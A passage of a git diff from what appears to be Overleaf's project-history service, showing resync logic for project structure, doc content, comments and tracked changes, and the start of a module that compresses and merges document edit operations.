_.pickBy(this.files, (v, k) => + this.isEditable(k, v, update.resyncProjectStructure.files) + ) + const persistedNonBinaryFiles = _.map( + Object.keys(persistedNonBinaryFileEntries), + path => ({ + path, + }) + ) + + const persistedBinaryFileEntries = _.omitBy(this.files, (v, k) => + this.isEditable(k, v, update.resyncProjectStructure.files) + ) + // preserve file properties on binary files, for future comparison. + const persistedBinaryFiles = _.map( + persistedBinaryFileEntries, + (entity, key) => Object.assign({}, entity, { path: key }) + ) + const expectedNonBinaryFiles = _.map( + update.resyncProjectStructure.docs, + entity => + Object.assign({}, entity, { + path: UpdateTranslator._convertPathname(entity.path), + }) + ) + const expectedBinaryFiles = _.map( + update.resyncProjectStructure.files, + entity => + Object.assign({}, entity, { + path: UpdateTranslator._convertPathname(entity.path), + }) + ) + + // We need to detect and fix consistency issues where web and + // history-store disagree on whether an entity is binary or not. Thus we + // need to remove and add the two separately. + this.queueRemoveOpsForUnexpectedFiles( + update, + expectedBinaryFiles, + persistedBinaryFiles + ) + this.queueRemoveOpsForUnexpectedFiles( + update, + expectedNonBinaryFiles, + persistedNonBinaryFiles + ) + this.queueAddOpsForMissingFiles( + update, + expectedBinaryFiles, + persistedBinaryFiles + ) + this.queueAddOpsForMissingFiles( + update, + expectedNonBinaryFiles, + persistedNonBinaryFiles + ) + this.queueUpdateForOutOfSyncBinaryFiles( + update, + expectedBinaryFiles, + persistedBinaryFiles + ) + this.queueSetMetadataOpsForLinkedFiles(update) + + if (update.resyncProjectStructureOnly) { + const docPaths = new Set() + for (const entity of update.resyncProjectStructure.docs) { + const path = UpdateTranslator._convertPathname(entity.path) + docPaths.add(path) + } + for (const expandedUpdate of this.expandedUpdates) { + if (docPaths.has(expandedUpdate.pathname)) { + // Clear the resync state and queue entry, we need to start over. 
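+          // (A structure-only resync must not touch doc contents, so when a
+          // queued op would modify a doc we abort below and let the caller
+          // fall back to a full resync.)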
+ this.expandedUpdates = [] + await clearResyncState(this.projectId) + await RedisManager.promises.deleteAppliedDocUpdate( + this.projectId, + update + ) + throw new NeedFullProjectStructureResyncError( + 'aborting partial resync: touched doc' + ) + } + } + } + } else if ('resyncDocContent' in update) { + logger.debug( + { projectId: this.projectId, update }, + 'expanding resyncDocContent update' + ) + await this.expandResyncDocContentUpdate(update) + } else { + this.expandedUpdates.push(update) + } + } + + getExpandedUpdates() { + return this.expandedUpdates + } + + /** + * @param {Entity[]} expectedFiles + * @param {{ path: string }[]} persistedFiles + */ + queueRemoveOpsForUnexpectedFiles(update, expectedFiles, persistedFiles) { + const unexpectedFiles = _.differenceBy( + persistedFiles, + expectedFiles, + 'path' + ) + for (const entity of unexpectedFiles) { + update = { + pathname: entity.path, + new_pathname: '', + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + } + this.expandedUpdates.push(update) + Metrics.inc('project_history_resync_operation', 1, { + status: 'remove unexpected file', + }) + } + } + + /** + * @param {Entity[]} expectedFiles + * @param {{ path: string }[]} persistedFiles + */ + queueAddOpsForMissingFiles(update, expectedFiles, persistedFiles) { + const missingFiles = _.differenceBy(expectedFiles, persistedFiles, 'path') + for (const entity of missingFiles) { + update = { + pathname: entity.path, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + } + + if ('doc' in entity) { + update.doc = entity.doc + update.docLines = '' + // we have to create a dummy entry here because later we will need the content in the diff computation + this.files[update.pathname] = File.fromString('') + } else { + update.file = entity.file + if (entity.url) update.url = entity.url + if (entity._hash) update.hash = entity._hash + if (entity.createdBlob) update.createdBlob = entity.createdBlob + if (entity.metadata) update.metadata = entity.metadata + } + + this.expandedUpdates.push(update) + Metrics.inc('project_history_resync_operation', 1, { + status: 'add missing file', + }) + } + } + + queueSetMetadataOpsForLinkedFiles(update) { + const allEntities = update.resyncProjectStructure.docs.concat( + update.resyncProjectStructure.files + ) + for (const file of allEntities) { + const pathname = UpdateTranslator._convertPathname(file.path) + const matchingAddFileOperation = this.expandedUpdates.some( + // Look for an addFile operation that already syncs the metadata. 
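+        // (If the file was just re-added by queueAddOpsForMissingFiles, that
+        // add op already carries the metadata, so a separate set-metadata op
+        // would be redundant.)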
+ u => u.pathname === pathname && u.metadata === file.metadata + ) + if (matchingAddFileOperation) continue + const metaData = this.files[pathname].getMetadata() + + let shouldUpdate = false + if (file.metadata) { + // check for in place update of linked-file + shouldUpdate = Object.entries(file.metadata).some( + ([k, v]) => metaData[k] !== v + ) + } else if (metaData.provider) { + // overwritten by non-linked-file with same hash + // or overwritten by doc + shouldUpdate = true + } + if (!shouldUpdate) continue + + this.expandedUpdates.push({ + pathname, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + metadata: file.metadata || {}, + }) + Metrics.inc('project_history_resync_operation', 1, { + status: 'update metadata', + }) + } + } + + queueUpdateForOutOfSyncBinaryFiles(update, expectedFiles, persistedFiles) { + // create a map to lookup persisted files by their path + const persistedFileMap = new Map(persistedFiles.map(x => [x.path, x])) + // now search for files with same path but different hash values + const differentFiles = expectedFiles.filter(expected => { + // check for a persisted file at the same path + const expectedPath = expected.path + const persistedFileAtSamePath = persistedFileMap.get(expectedPath) + if (!persistedFileAtSamePath) return false + // check if the persisted file at the same path has a different hash + const expectedHash = _.get(expected, '_hash') + const persistedHash = _.get(persistedFileAtSamePath, ['data', 'hash']) + const hashesPresent = expectedHash && persistedHash + return hashesPresent && persistedHash !== expectedHash + }) + for (const entity of differentFiles) { + // remove the outdated persisted file + const removeUpdate = { + pathname: entity.path, + new_pathname: '', + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + } + this.expandedUpdates.push(removeUpdate) + // add the new file content + const addUpdate = { + pathname: entity.path, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + file: entity.file, + } + if (entity.url) addUpdate.url = entity.url + if (entity._hash) addUpdate.hash = entity._hash + if (entity.createdBlob) addUpdate.createdBlob = entity.createdBlob + if (entity.metadata) addUpdate.metadata = entity.metadata + this.expandedUpdates.push(addUpdate) + Metrics.inc('project_history_resync_operation', 1, { + status: 'update binary file contents', + }) + } + } + + /** + * Expand a resyncDocContentUpdate + * + * @param {ResyncDocContentUpdate} update + */ + async expandResyncDocContentUpdate(update) { + const pathname = UpdateTranslator._convertPathname(update.path) + const snapshotFile = this.files[pathname] + const expectedFile = update.resyncDocContent + const expectedContent = expectedFile.content + + if (!snapshotFile) { + throw new OError('unrecognised file: not in snapshot') + } + + // Compare hashes to see if the persisted file matches the expected content. + // The hash of the persisted files is stored in the snapshot. + // Note getHash() returns the hash only when the persisted file has + // no changes in the snapshot, the hash is null if there are changes + // that apply to it. 
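+    // (e.g. for a doc with no pending ops in the snapshot, the stored hash
+    // and the hash of the expected content usually match, so the expensive
+    // content diff below can be skipped; the file is still loaded afterwards
+    // to sync comments and tracked changes.)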
+ let hashesMatch = false + const persistedHash = snapshotFile.getHash() + if (persistedHash != null) { + const expectedHash = HashManager._getBlobHashFromString(expectedContent) + if (persistedHash === expectedHash) { + logger.debug( + { projectId: this.projectId, persistedHash, expectedHash }, + 'skipping diff because hashes match and persisted file has no ops' + ) + hashesMatch = true + } + } else { + logger.debug('cannot compare hashes, will retrieve content') + } + + // compute the difference between the expected and persisted content + const historyId = await WebApiManager.promises.getHistoryId(this.projectId) + const file = await snapshotFile.load( + 'eager', + HistoryStoreManager.getBlobStore(historyId) + ) + const persistedContent = file.getContent() + if (persistedContent == null) { + // This should not happen given that we loaded the file eagerly. We could + // probably refine the types in overleaf-editor-core so that this check + // wouldn't be necessary. + throw new Error('File was not properly loaded') + } + + if (!hashesMatch) { + const expandedUpdate = await this.queueUpdateForOutOfSyncContent( + update, + pathname, + persistedContent, + expectedContent + ) + if (expandedUpdate != null) { + // Adjust the ranges for the changes that have been made to the content + for (const op of expandedUpdate.op) { + if (isInsert(op)) { + file.getComments().applyInsert(new Range(op.p, op.i.length)) + file.getTrackedChanges().applyInsert(op.p, op.i) + } else if (isDelete(op)) { + file.getComments().applyDelete(new Range(op.p, op.d.length)) + file.getTrackedChanges().applyDelete(op.p, op.d.length) + } + } + } + } + + const persistedComments = file.getComments().toArray() + await this.queueUpdatesForOutOfSyncComments( + update, + pathname, + persistedComments + ) + + const persistedChanges = file.getTrackedChanges().asSorted() + await this.queueUpdatesForOutOfSyncTrackedChanges( + update, + pathname, + persistedChanges + ) + } + + /** + * Queue update for out of sync content + * + * @param {ResyncDocContentUpdate} update + * @param {string} pathname + * @param {string} persistedContent + * @param {string} expectedContent + */ + async queueUpdateForOutOfSyncContent( + update, + pathname, + persistedContent, + expectedContent + ) { + logger.debug( + { projectId: this.projectId, persistedContent, expectedContent }, + 'diffing doc contents' + ) + const op = UpdateCompressor.diffAsShareJsOps( + persistedContent, + expectedContent + ) + if (op.length === 0) { + return null + } + const expandedUpdate = { + doc: update.doc, + op, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + pathname, + doc_length: persistedContent.length, + }, + } + logger.debug( + { projectId: this.projectId, diffCount: op.length }, + 'doc contents differ' + ) + this.expandedUpdates.push(expandedUpdate) + Metrics.inc('project_history_resync_operation', 1, { + status: 'update text file contents', + }) + return expandedUpdate + } + + /** + * Queue updates for out of sync comments + * + * @param {ResyncDocContentUpdate} update + * @param {string} pathname + * @param {HistoryComment[]} persistedComments + */ + async queueUpdatesForOutOfSyncComments(update, pathname, persistedComments) { + const expectedContent = update.resyncDocContent.content + const expectedComments = update.resyncDocContent.ranges?.comments ?? [] + const resolvedCommentIds = new Set( + update.resyncDocContent.resolvedCommentIds ?? 
[] + ) + const expectedCommentsById = new Map( + expectedComments.map(comment => [comment.id, comment]) + ) + const persistedCommentsById = new Map( + persistedComments.map(comment => [comment.id, comment]) + ) + + // Delete any persisted comment that is not in the expected comment list. + for (const persistedComment of persistedComments) { + if (!expectedCommentsById.has(persistedComment.id)) { + this.expandedUpdates.push({ + pathname, + deleteComment: persistedComment.id, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + }) + } + } + + for (const expectedComment of expectedComments) { + const persistedComment = persistedCommentsById.get(expectedComment.id) + const expectedCommentResolved = resolvedCommentIds.has(expectedComment.id) + if ( + persistedComment != null && + commentRangesAreInSync(persistedComment, expectedComment) + ) { + if (expectedCommentResolved === persistedComment.resolved) { + // Both comments are identical; do nothing + } else { + // Only the resolved state differs + this.expandedUpdates.push({ + pathname, + commentId: expectedComment.id, + resolved: expectedCommentResolved, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + }) + } + } else { + const op = { ...expectedComment.op, resolved: expectedCommentResolved } + // New comment or ranges differ + this.expandedUpdates.push({ + doc: update.doc, + op: [op], + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + pathname, + doc_length: expectedContent.length, + }, + }) + } + } + } + + /** + * Queue updates for out of sync tracked changes + * + * @param {ResyncDocContentUpdate} update + * @param {string} pathname + * @param {readonly HistoryTrackedChange[]} persistedChanges + */ + async queueUpdatesForOutOfSyncTrackedChanges( + update, + pathname, + persistedChanges + ) { + const expectedChanges = update.resyncDocContent.ranges?.changes ?? [] + const expectedContent = update.resyncDocContent.content + + /** + * A cursor on the expected content + */ + let cursor = 0 + + /** + * The persisted tracking at cursor + * + * @type {TrackingDirective} + */ + let persistedTracking = { type: 'none' } + + /** + * The expected tracking at cursor + * + * @type {TrackingDirective} + */ + let expectedTracking = { type: 'none' } + + /** + * The retain ops for the update + * + * @type {RetainOp[]} + */ + const ops = [] + + /** + * The retain op being built + * + * @type {RetainOp | null} + */ + let currentOp = null + + for (const transition of getTrackedChangesTransitions( + persistedChanges, + expectedChanges, + expectedContent.length + )) { + if (transition.pos > cursor) { + // The next transition will move the cursor. Decide what to do with the interval. + if (trackingDirectivesEqual(expectedTracking, persistedTracking)) { + // Expected tracking and persisted tracking are in sync. Emit the + // current op and skip this interval. + if (currentOp != null) { + ops.push(currentOp) + currentOp = null + } + } else { + // Expected tracking and persisted tracking are different. + const retainedText = expectedContent.slice(cursor, transition.pos) + if ( + currentOp?.tracking != null && + trackingDirectivesEqual(expectedTracking, currentOp.tracking) + ) { + // The current op has the right tracking. Extend it. + currentOp.r += retainedText + } else { + // The current op doesn't have the right tracking. Emit the current + // op and start a new one. 
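+            // (e.g. when the expected tracking switches from an insert by one
+            // user to an insert by another at this position, the directives
+            // compare unequal and a fresh retain op is started for the new
+            // tracking type.)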
+ if (currentOp != null) { + ops.push(currentOp) + } + currentOp = { + r: retainedText, + p: cursor, + tracking: expectedTracking, + } + } + } + + // Advance cursor + cursor = transition.pos + } + + // Update the expected and persisted tracking + if (transition.stage === 'persisted') { + persistedTracking = transition.tracking + } else { + expectedTracking = transition.tracking + } + } + + // Emit the last op + if (currentOp != null) { + ops.push(currentOp) + } + + if (ops.length > 0) { + this.expandedUpdates.push({ + doc: update.doc, + op: ops, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + pathname, + doc_length: expectedContent.length, + }, + }) + } + } +} + +/** + * Compares the ranges in the persisted and expected comments + * + * @param {HistoryComment} persistedComment + * @param {Comment} expectedComment + */ +function commentRangesAreInSync(persistedComment, expectedComment) { + const expectedPos = expectedComment.op.hpos ?? expectedComment.op.p + const expectedLength = expectedComment.op.hlen ?? expectedComment.op.c.length + if (expectedLength === 0) { + // A zero length comment from RangesManager is a detached comment in history + return persistedComment.ranges.length === 0 + } + + if (persistedComment.ranges.length !== 1) { + // The editor only supports single range comments + return false + } + const persistedRange = persistedComment.ranges[0] + return ( + persistedRange.pos === expectedPos && + persistedRange.length === expectedLength + ) +} + +/** + * Iterates through expected tracked changes and persisted tracked changes and + * returns all transitions, sorted by position. + * + * @param {readonly HistoryTrackedChange[]} persistedChanges + * @param {TrackedChange[]} expectedChanges + * @param {number} docLength + */ +function getTrackedChangesTransitions( + persistedChanges, + expectedChanges, + docLength +) { + /** @type {TrackedChangeTransition[]} */ + const transitions = [] + + for (const change of persistedChanges) { + transitions.push({ + stage: 'persisted', + pos: change.range.start, + tracking: { + type: change.tracking.type, + userId: change.tracking.userId, + ts: change.tracking.ts.toISOString(), + }, + }) + transitions.push({ + stage: 'persisted', + pos: change.range.end, + tracking: { type: 'none' }, + }) + } + + for (const change of expectedChanges) { + const op = change.op + const pos = op.hpos ?? 
op.p + if (isInsert(op)) { + transitions.push({ + stage: 'expected', + pos, + tracking: { + type: 'insert', + userId: change.metadata.user_id, + ts: change.metadata.ts, + }, + }) + transitions.push({ + stage: 'expected', + pos: pos + op.i.length, + tracking: { type: 'none' }, + }) + } else { + transitions.push({ + stage: 'expected', + pos, + tracking: { + type: 'delete', + userId: change.metadata.user_id, + ts: change.metadata.ts, + }, + }) + transitions.push({ + stage: 'expected', + pos: pos + op.d.length, + tracking: { type: 'none' }, + }) + } + } + + transitions.push({ + stage: 'expected', + pos: docLength, + tracking: { type: 'none' }, + }) + + transitions.sort((a, b) => { + if (a.pos < b.pos) { + return -1 + } else if (a.pos > b.pos) { + return 1 + } else if (a.tracking.type === 'none' && b.tracking.type !== 'none') { + // none type comes before other types so that it can be overridden at the + // same position + return -1 + } else if (a.tracking.type !== 'none' && b.tracking.type === 'none') { + // none type comes before other types so that it can be overridden at the + // same position + return 1 + } else { + return 0 + } + }) + + return transitions +} + +/** + * Returns true if both tracking directives are equal + * + * @param {TrackingDirective} a + * @param {TrackingDirective} b + */ +function trackingDirectivesEqual(a, b) { + if (a.type === 'none') { + return b.type === 'none' + } else { + return a.type === b.type && a.userId === b.userId && a.ts === b.ts + } +} + +// EXPORTS + +const startResyncCb = callbackify(startResync) +const startResyncWithoutLockCb = callbackify(startResyncWithoutLock) +const startHardResyncCb = callbackify(startHardResync) +const setResyncStateCb = callbackify(setResyncState) +const clearResyncStateCb = callbackify(clearResyncState) +const skipUpdatesDuringSyncCb = callbackifyMultiResult(skipUpdatesDuringSync, [ + 'updates', + 'syncState', +]) + +/** + * @param {string} projectId + * @param {string} projectHistoryId + * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} mostRecentChunk + * @param {Array<Update>} updates + * @param {() => void} extendLock + * @param {(err: Error | null, updates?: Array<Update>) => void} callback + */ +const expandSyncUpdatesCb = ( + projectId, + projectHistoryId, + mostRecentChunk, + updates, + extendLock, + callback +) => { + const extendLockPromises = promisify(extendLock) + expandSyncUpdates( + projectId, + projectHistoryId, + mostRecentChunk, + updates, + extendLockPromises + ) + .then(result => { + callback(null, result) + }) + .catch(err => { + callback(err) + }) +} + +export { + startResyncCb as startResync, + startResyncWithoutLockCb as startResyncWithoutLock, + startHardResyncCb as startHardResync, + setResyncStateCb as setResyncState, + clearResyncStateCb as clearResyncState, + skipUpdatesDuringSyncCb as skipUpdatesDuringSync, + expandSyncUpdatesCb as expandSyncUpdates, +} + +export const promises = { + startResync, + startResyncWithoutLock, + startHardResync, + setResyncState, + clearResyncState, + clearResyncStateIfAllAfter, + skipUpdatesDuringSync, + expandSyncUpdates, +} diff --git a/services/project-history/app/js/UpdateCompressor.js b/services/project-history/app/js/UpdateCompressor.js new file mode 100644 index 0000000..b548b75 --- /dev/null +++ b/services/project-history/app/js/UpdateCompressor.js @@ -0,0 +1,491 @@ +// @ts-check + +import OError from '@overleaf/o-error' +import DMP from 'diff-match-patch' + +/** + * @import { DeleteOp, InsertOp, Op, Update } from './types' + */ + 
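+// Informal overview of compressRawUpdates() below: raw updates from
+// document-updater are split into single-op updates, adjacent compatible ops
+// are merged (e.g. consecutive inserts by the same user within a minute),
+// blank ops left over from diffing are dropped, and ops that share a version
+// are concatenated back into a single update.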
+const MAX_TIME_BETWEEN_UPDATES = 60 * 1000 // one minute
+const MAX_UPDATE_SIZE = 2 * 1024 * 1024 // 2 MB
+const ADDED = 1
+const REMOVED = -1
+const UNCHANGED = 0
+
+const strInject = (s1, pos, s2) => s1.slice(0, pos) + s2 + s1.slice(pos)
+const strRemove = (s1, pos, length) => s1.slice(0, pos) + s1.slice(pos + length)
+
+const dmp = new DMP()
+dmp.Diff_Timeout = 0.1 // prevent the diff algorithm from searching too hard for changes in unrelated content
+
+const cloneWithOp = function (update, op) {
+  // to improve performance, shallow clone the update
+  // and its meta property (also an object), then
+  // overwrite the op property directly.
+  update = Object.assign({}, update)
+  update.meta = Object.assign({}, update.meta)
+  update.op = op
+  return update
+}
+const mergeUpdatesWithOp = function (firstUpdate, secondUpdate, op) {
+  // We want to take doc_length and ts from the firstUpdate, v and doc_hash from the second
+  const update = cloneWithOp(firstUpdate, op)
+  if (secondUpdate.v != null) {
+    update.v = secondUpdate.v
+  }
+  if (secondUpdate.meta.doc_hash != null) {
+    update.meta.doc_hash = secondUpdate.meta.doc_hash
+  } else {
+    delete update.meta.doc_hash
+  }
+  return update
+}
+
+/**
+ * Adjust the given length to account for the given op
+ *
+ * The resulting length is the new length of the doc after the op is applied.
+ *
+ * @param {number} length
+ * @param {Op} op
+ * @param {object} opts
+ * @param {boolean} [opts.tracked] - whether or not the update is a tracked change
+ * @returns {number} the adjusted length
+ */
+function adjustLengthByOp(length, op, opts = {}) {
+  if ('i' in op && op.i != null) {
+    if (op.trackedDeleteRejection) {
+      // Tracked delete rejection: will be translated into a retain
+      return length
+    } else {
+      return length + op.i.length
+    }
+  } else if ('d' in op && op.d != null) {
+    if (opts.tracked) {
+      // Tracked delete: will be translated into a retain, except where it overlaps tracked inserts.
+      for (const change of op.trackedChanges ?? []) {
+        if (change.type === 'insert') {
+          length -= change.length
+        }
+      }
+      return length
+    } else {
+      return length - op.d.length
+    }
+  } else if ('r' in op && op.r != null) {
+    return length
+  } else if ('c' in op && op.c != null) {
+    return length
+  } else {
+    throw new OError('unexpected op type')
+  }
+}
+
+/**
+ * Updates come from the doc updater in the format
+ * {
+ *   op: [ { ... op1 ... }, { ... op2 ... } ]
+ *   meta: { ts: ..., user_id: ... }
+ * }
+ * but it's easier to work with one op per update, so convert these updates to
+ * our compressed format
+ * [{
+ *   op: op1
+ *   meta: { ts: ..., user_id: ... }
+ * }, {
+ *   op: op2
+ *   meta: { ts: ..., user_id: ... }
+ * }]
+ *
+ * @param {Update[]} updates
+ * @returns {Update[]} single op updates
+ */
+export function convertToSingleOpUpdates(updates) {
+  const splitUpdates = []
+  for (const update of updates) {
+    if (!('op' in update)) {
+      // Not a text op, likely a project structure op
+      splitUpdates.push(update)
+      continue
+    }
+    const ops = update.op
+
+    let docLength = update.meta.history_doc_length ?? update.meta.doc_length
+    // Temporary fix for document-updater sending a length of -1 for empty
+    // documents. This can be removed after all queues have been flushed.
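+    // (e.g. with the -1 sentinel mapped to 0 below, splitting an update that
+    // inserts 'ab' into an empty doc records doc_length 0 for that op rather
+    // than -1.)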
+ if (docLength === -1) { + docLength = 0 + } + const docHash = update.meta.doc_hash + for (const op of ops) { + const splitUpdate = cloneWithOp(update, op) + // Only the last update will keep the doc_hash property + delete splitUpdate.meta.doc_hash + if (docLength != null) { + splitUpdate.meta.doc_length = docLength + docLength = adjustLengthByOp(docLength, op, { + tracked: update.meta.tc != null, + }) + delete splitUpdate.meta.history_doc_length + } + splitUpdates.push(splitUpdate) + } + if (docHash != null && splitUpdates.length > 0) { + splitUpdates[splitUpdates.length - 1].meta.doc_hash = docHash + } + } + return splitUpdates +} + +export function filterBlankUpdates(updates) { + // Diffing an insert and delete can return blank inserts and deletes + // which the OL history service doesn't have an equivalent for. + // + // NOTE: this relies on the updates only containing either op.i or op.d entries + // but not both, which is the case because diffAsShareJsOps does this + return updates.filter( + update => !(update.op && (update.op.i === '' || update.op.d === '')) + ) +} + +export function concatUpdatesWithSameVersion(updates) { + const concattedUpdates = [] + for (let update of updates) { + if (update.op != null) { + update = cloneWithOp(update, [update.op]) + + const lastUpdate = concattedUpdates[concattedUpdates.length - 1] + if ( + lastUpdate != null && + lastUpdate.op != null && + lastUpdate.v === update.v && + lastUpdate.doc === update.doc && + lastUpdate.pathname === update.pathname + ) { + lastUpdate.op = lastUpdate.op.concat(update.op) + if (update.meta.doc_hash == null) { + delete lastUpdate.meta.doc_hash + } else { + lastUpdate.meta.doc_hash = update.meta.doc_hash + } + } else { + concattedUpdates.push(update) + } + } else { + concattedUpdates.push(update) + } + } + return concattedUpdates +} + +export function compressRawUpdates(rawUpdates) { + let updates = convertToSingleOpUpdates(rawUpdates) + updates = compressUpdates(updates) + updates = filterBlankUpdates(updates) + updates = concatUpdatesWithSameVersion(updates) + return updates +} + +export function compressUpdates(updates) { + if (updates.length === 0) { + return [] + } + + let compressedUpdates = [updates.shift()] + for (const update of updates) { + const lastCompressedUpdate = compressedUpdates.pop() + if (lastCompressedUpdate != null) { + const newCompressedUpdates = _concatTwoUpdates( + lastCompressedUpdate, + update + ) + + compressedUpdates = compressedUpdates.concat(newCompressedUpdates) + } else { + compressedUpdates.push(update) + } + } + + return compressedUpdates +} + +/** + * If possible, merge two updates into a single update that has the same effect. + * + * It's useful to do some of this work at this point while we're dealing with + * document-updater updates. The deletes, in particular include the deleted + * text. This allows us to find pieces of inserts and deletes that cancel each + * other out because they insert/delete the exact same text. This compression + * makes the diff smaller. + */ +function _concatTwoUpdates(firstUpdate, secondUpdate) { + // Previously we cloned firstUpdate and secondUpdate at this point but we + // can skip this step because whenever they are returned with + // modification there is always a clone at that point via + // mergeUpdatesWithOp. 
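+  // Worked example (informal): two consecutive keystrokes
+  //   { op: { i: 'a', p: 5 }, meta: { ts: 1000, user_id: 'u1' } }
+  //   { op: { i: 'b', p: 6 }, meta: { ts: 1500, user_id: 'u1' } }
+  // pass the guards below and merge into a single { i: 'ab', p: 5 }, while
+  // updates from different users or docs, or too far apart in time, are
+  // returned unmerged.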
+ + if (firstUpdate.op == null || secondUpdate.op == null) { + // Project structure ops + return [firstUpdate, secondUpdate] + } + + if ( + firstUpdate.doc !== secondUpdate.doc || + firstUpdate.pathname !== secondUpdate.pathname + ) { + return [firstUpdate, secondUpdate] + } + + if (firstUpdate.meta.user_id !== secondUpdate.meta.user_id) { + return [firstUpdate, secondUpdate] + } + + if ( + (firstUpdate.meta.type === 'external' && + secondUpdate.meta.type !== 'external') || + (firstUpdate.meta.type !== 'external' && + secondUpdate.meta.type === 'external') || + (firstUpdate.meta.type === 'external' && + secondUpdate.meta.type === 'external' && + firstUpdate.meta.source !== secondUpdate.meta.source) + ) { + return [firstUpdate, secondUpdate] + } + + if (secondUpdate.meta.ts - firstUpdate.meta.ts > MAX_TIME_BETWEEN_UPDATES) { + return [firstUpdate, secondUpdate] + } + + if ( + (firstUpdate.meta.tc == null && secondUpdate.meta.tc != null) || + (firstUpdate.meta.tc != null && secondUpdate.meta.tc == null) + ) { + // One update is tracking changes and the other isn't. Tracking changes + // results in different behaviour in the history, so we need to keep these + // two updates separate. + return [firstUpdate, secondUpdate] + } + + if (Boolean(firstUpdate.op.u) !== Boolean(secondUpdate.op.u)) { + // One update is an undo and the other isn't. If we were to merge the two + // updates, we would have to choose one value for the flag, which would be + // partially incorrect. Moreover, a tracked delete that is also an undo is + // treated as a tracked insert rejection by the history, so these updates + // need to be well separated. + return [firstUpdate, secondUpdate] + } + + if ( + firstUpdate.op.trackedDeleteRejection || + secondUpdate.op.trackedDeleteRejection + ) { + // Do not merge tracked delete rejections. Each tracked delete rejection is + // a separate operation. + return [firstUpdate, secondUpdate] + } + + if ( + firstUpdate.op.trackedChanges != null || + secondUpdate.op.trackedChanges != null + ) { + // Do not merge ops that span tracked changes. + // TODO: This could theoretically be handled, but it would be complex. One + // would need to take tracked deletes into account when merging inserts and + // deletes together. 
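+    // (Such ops record where a delete overlapped tracked inserts, so naively
+    // concatenating their text could misalign those recorded ranges.)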
+    return [firstUpdate, secondUpdate]
+  }
+
+  const firstOp = firstUpdate.op
+  const secondOp = secondUpdate.op
+  const firstSize =
+    (firstOp.i && firstOp.i.length) || (firstOp.d && firstOp.d.length)
+  const secondSize =
+    (secondOp.i && secondOp.i.length) || (secondOp.d && secondOp.d.length)
+  const firstOpInsideSecondOp =
+    secondOp.p <= firstOp.p && firstOp.p <= secondOp.p + secondSize
+  const secondOpInsideFirstOp =
+    firstOp.p <= secondOp.p && secondOp.p <= firstOp.p + firstSize
+  const combinedLengthUnderLimit = firstSize + secondSize < MAX_UPDATE_SIZE
+
+  // Two inserts
+  if (
+    firstOp.i != null &&
+    secondOp.i != null &&
+    secondOpInsideFirstOp &&
+    combinedLengthUnderLimit &&
+    insertOpsInsideSameComments(firstOp, secondOp)
+  ) {
+    return [
+      mergeUpdatesWithOp(firstUpdate, secondUpdate, {
+        ...firstOp,
+        i: strInject(firstOp.i, secondOp.p - firstOp.p, secondOp.i),
+      }),
+    ]
+  }
+
+  // Two deletes
+  if (
+    firstOp.d != null &&
+    secondOp.d != null &&
+    firstOpInsideSecondOp &&
+    combinedLengthUnderLimit &&
+    firstUpdate.meta.tc == null &&
+    secondUpdate.meta.tc == null
+  ) {
+    return [
+      mergeUpdatesWithOp(firstUpdate, secondUpdate, {
+        ...secondOp,
+        d: strInject(secondOp.d, firstOp.p - secondOp.p, firstOp.d),
+      }),
+    ]
+  }
+
+  // An insert and then a delete
+  if (
+    firstOp.i != null &&
+    secondOp.d != null &&
+    secondOpInsideFirstOp &&
+    firstUpdate.meta.tc == null &&
+    secondUpdate.meta.tc == null
+  ) {
+    const offset = secondOp.p - firstOp.p
+    const insertedText = firstOp.i.slice(offset, offset + secondOp.d.length)
+    // Only trim the insert when the delete is fully contained within it
+    if (insertedText === secondOp.d) {
+      const insert = strRemove(firstOp.i, offset, secondOp.d.length)
+      if (insert === '') {
+        return []
+      } else {
+        return [
+          mergeUpdatesWithOp(firstUpdate, secondUpdate, {
+            ...firstOp,
+            i: insert,
+          }),
+        ]
+      }
+    } else {
+      // This will only happen if the delete extends outside the insert
+      return [firstUpdate, secondUpdate]
+    }
+  }
+
+  // A delete then an insert at the same place, likely a copy-paste of a chunk of content
+  if (
+    firstOp.d != null &&
+    secondOp.i != null &&
+    firstOp.p === secondOp.p &&
+    firstUpdate.meta.tc == null &&
+    secondUpdate.meta.tc == null
+  ) {
+    const offset = firstOp.p
+    const hoffset = firstOp.hpos
+    const diffUpdates = diffAsShareJsOps(firstOp.d, secondOp.i).map(
+      function (op) {
+        // diffAsShareJsOps() returns ops with positions relative to the position
+        // of the copy/paste. We need to adjust these positions so that they
+        // apply to the whole document instead.
+        const pos = op.p
+        op.p = pos + offset
+        if (hoffset != null) {
+          op.hpos = pos + hoffset
+        }
+        if (firstOp.u && secondOp.u) {
+          op.u = true
+        }
+        if ('i' in op && secondOp.commentIds != null) {
+          // Make sure that commentIds metadata is propagated to inserts
+          op.commentIds = secondOp.commentIds
+        }
+        const update = mergeUpdatesWithOp(firstUpdate, secondUpdate, op)
+        // Set the doc hash only on the last update
+        delete update.meta.doc_hash
+        return update
+      }
+    )
+    const docHash = secondUpdate.meta.doc_hash
+    if (docHash != null && diffUpdates.length > 0) {
+      diffUpdates[diffUpdates.length - 1].meta.doc_hash = docHash
+    }
+
+    // Doing a diff like this loses track of the doc lengths for each
+    // update, so recalculate them
+    let docLength =
+      firstUpdate.meta.history_doc_length ??
